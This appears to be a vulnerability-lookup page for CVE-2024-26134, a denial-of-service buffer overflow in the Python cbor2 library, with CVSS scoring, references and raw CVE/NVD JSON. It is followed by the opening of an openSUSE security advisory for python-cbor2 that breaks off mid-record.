cvelistv5 - CVE-2024-26134

CVE-2024-26134 (GCVE-0-2024-26134)

Vulnerability from cvelistv5 – Published: 2024-02-19 22:13 – Updated: 2025-02-13 17:41

Summary

cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/agronholm/cbor2/security/advis…	x_refsource_CONFIRM
	https://github.com/agronholm/cbor2/pull/204	x_refsource_MISC
	https://github.com/agronholm/cbor2/commit/387755e…	x_refsource_MISC
	https://github.com/agronholm/cbor2/commit/4de6991…	x_refsource_MISC
	https://github.com/agronholm/cbor2/releases/tag/5.6.2	x_refsource_MISC
	https://lists.fedoraproject.org/archives/list/pac…
	https://lists.fedoraproject.org/archives/list/pac…
	https://lists.fedoraproject.org/archives/list/pac…

Impacted products

	Vendor	Product	Version
	agronholm	cbor2	Affected: >= 5.5.1, < 5.6.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:59:32.554Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
          },
          {
            "name": "https://github.com/agronholm/cbor2/pull/204",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/agronholm/cbor2/pull/204"
          },
          {
            "name": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542"
          },
          {
            "name": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df"
          },
          {
            "name": "https://github.com/agronholm/cbor2/releases/tag/5.6.2",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/agronholm/cbor2/releases/tag/5.6.2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:agronholm:cbor2:5.5.1:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "cbor2",
            "vendor": "agronholm",
            "versions": [
              {
                "lessThan": "5.6.2",
                "status": "affected",
                "version": "5.5.1",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26134",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-20T18:24:08.985048Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-14T13:57:54.799Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "cbor2",
          "vendor": "agronholm",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.5.1, \u003c 5.6.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-120",
              "description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-04-19T23:06:51.306Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m"
        },
        {
          "name": "https://github.com/agronholm/cbor2/pull/204",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/agronholm/cbor2/pull/204"
        },
        {
          "name": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542"
        },
        {
          "name": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df"
        },
        {
          "name": "https://github.com/agronholm/cbor2/releases/tag/5.6.2",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/agronholm/cbor2/releases/tag/5.6.2"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/"
        }
      ],
      "source": {
        "advisory": "GHSA-375g-39jq-vq7m",
        "discovery": "UNKNOWN"
      },
      "title": "CBOR2 decoder has potential buffer overflow"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-26134",
    "datePublished": "2024-02-19T22:13:47.173Z",
    "dateReserved": "2024-02-14T17:40:03.687Z",
    "dateUpdated": "2025-02-13T17:41:03.627Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:agronholm:cbor2:*:*:*:*:*:python:*:*\", \"versionStartIncluding\": \"5.5.1\", \"versionEndExcluding\": \"5.6.2\", \"matchCriteriaId\": \"29EB593C-8078-4174-9947-A3590CF93D51\"}]}]}, {\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"CC559B26-5DFC-4B7A-A27C-B77DE755DFF9\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"CA277A6C-83EC-4536-9125-97B84C4FAF59\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.\"}, {\"lang\": \"es\", \"value\": \"cbor2 proporciona codificaci\\u00f3n y decodificaci\\u00f3n para el formato de serializaci\\u00f3n de representaci\\u00f3n concisa de objetos binarios (CBOR) (RFC 8949). A partir de la versi\\u00f3n 5.5.1 y antes de la versi\\u00f3n 5.6.2, un atacante puede bloquear un servicio que utiliza cbor2 para analizar un binario CBOR enviando un objeto lo suficientemente largo. La versi\\u00f3n 5.6.2 contiene un parche para este problema.\"}]",
      "id": "CVE-2024-26134",
      "lastModified": "2025-01-02T14:18:48.553",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.6}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.6}]}",
      "published": "2024-02-19T23:15:07.810",
      "references": "[{\"url\": \"https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Product\"]}, {\"url\": \"https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/agronholm/cbor2/pull/204\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Issue Tracking\"]}, {\"url\": \"https://github.com/agronholm/cbor2/releases/tag/5.6.2\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Mailing List\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Mailing List\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Mailing List\"]}, {\"url\": \"https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Product\"]}, {\"url\": \"https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/agronholm/cbor2/pull/204\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Issue Tracking\"]}, {\"url\": \"https://github.com/agronholm/cbor2/releases/tag/5.6.2\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Mailing List\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Mailing List\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Mailing List\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Analyzed",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-120\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-120\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-26134\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-02-19T23:15:07.810\",\"lastModified\":\"2025-01-02T14:18:48.553\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.\"},{\"lang\":\"es\",\"value\":\"cbor2 proporciona codificaci\u00f3n y decodificaci\u00f3n para el formato de serializaci\u00f3n de representaci\u00f3n concisa de objetos binarios (CBOR) (RFC 8949). A partir de la versi\u00f3n 5.5.1 y antes de la versi\u00f3n 5.6.2, un atacante puede bloquear un servicio que utiliza cbor2 para analizar un binario CBOR enviando un objeto lo suficientemente largo. La versi\u00f3n 5.6.2 contiene un parche para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-120\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-120\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:agronholm:cbor2:*:*:*:*:*:python:*:*\",\"versionStartIncluding\":\"5.5.1\",\"versionEndExcluding\":\"5.6.2\",\"matchCriteriaId\":\"29EB593C-8078-4174-9947-A3590CF93D51\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CC559B26-5DFC-4B7A-A27C-B77DE755DFF9\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"CA277A6C-83EC-4536-9125-97B84C4FAF59\"}]}]}],\"references\":[{\"url\":\"https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/agronholm/cbor2/pull/204\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/agronholm/cbor2/releases/tag/5.6.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Mailing List\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Mailing List\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Mailing List\"]},{\"url\":\"https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/agronholm/cbor2/pull/204\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/agronholm/cbor2/releases/tag/5.6.2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\"]},{\"url\":\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m\", \"name\": \"https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/agronholm/cbor2/pull/204\", \"name\": \"https://github.com/agronholm/cbor2/pull/204\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542\", \"name\": \"https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df\", \"name\": \"https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/agronholm/cbor2/releases/tag/5.6.2\", \"name\": \"https://github.com/agronholm/cbor2/releases/tag/5.6.2\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-01T23:59:32.554Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-26134\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-02-20T18:24:08.985048Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:agronholm:cbor2:5.5.1:*:*:*:*:*:*:*\"], \"vendor\": \"agronholm\", \"product\": \"cbor2\", \"versions\": [{\"status\": \"affected\", \"version\": \"5.5.1\", \"lessThan\": \"5.6.2\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-14T13:57:49.585Z\"}}], \"cna\": {\"title\": \"CBOR2 decoder has potential buffer overflow\", \"source\": {\"advisory\": \"GHSA-375g-39jq-vq7m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"agronholm\", \"product\": \"cbor2\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 5.5.1, \u003c 5.6.2\"}]}], \"references\": [{\"url\": \"https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m\", \"name\": \"https://github.com/agronholm/cbor2/security/advisories/GHSA-375g-39jq-vq7m\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/agronholm/cbor2/pull/204\", \"name\": \"https://github.com/agronholm/cbor2/pull/204\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542\", \"name\": \"https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df\", \"name\": \"https://github.com/agronholm/cbor2/commit/4de6991ba29bf2290d7b9d83525eda7d021873df\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/agronholm/cbor2/releases/tag/5.6.2\", \"name\": \"https://github.com/agronholm/cbor2/releases/tag/5.6.2\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GX524ZG2XJWFV37UQKQ4LWIH4UICSGEQ/\"}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BT42VXZMMMCSSHMA65KKPOZCXJEYHNR5/\"}, {\"url\": \"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWC3VU6YV6EXKCSX5GTKWLBZIDIJNQJY/\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) (RFC 8949) serialization format. Starting in version 5.5.1 and prior to version 5.6.2, an attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object. Version 5.6.2 contains a patch for this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-120\", \"description\": \"CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-04-19T23:06:51.306Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-26134\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-13T17:41:03.627Z\", \"dateReserved\": \"2024-02-14T17:40:03.687Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-02-19T22:13:47.173Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

OPENSUSE-SU-2025-20133-1

Vulnerability from csaf_opensuse - Published: 2025-12-02 13:51 - Updated: 2025-12-02 13:51

Summary

Security update for python-cbor2

Notes

Title of the patch

Security update for python-cbor2

Description of the patch

This update for python-cbor2 fixes the following issues: - CVE-2025-64076: Fixed bug in decode_definite_long_string() that causes incorrect chunk length calculation (bsc#1253746). Already fixed in release 5.6.3: - CVE-2024-26134: Fixed potential crash when hashing a CBORTag (bsc#1220096).

Patchnames

openSUSE-Leap-16.0-91

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Security update for python-cbor2",
        "title": "Title of the patch"
      },
      {
        "category": "description",
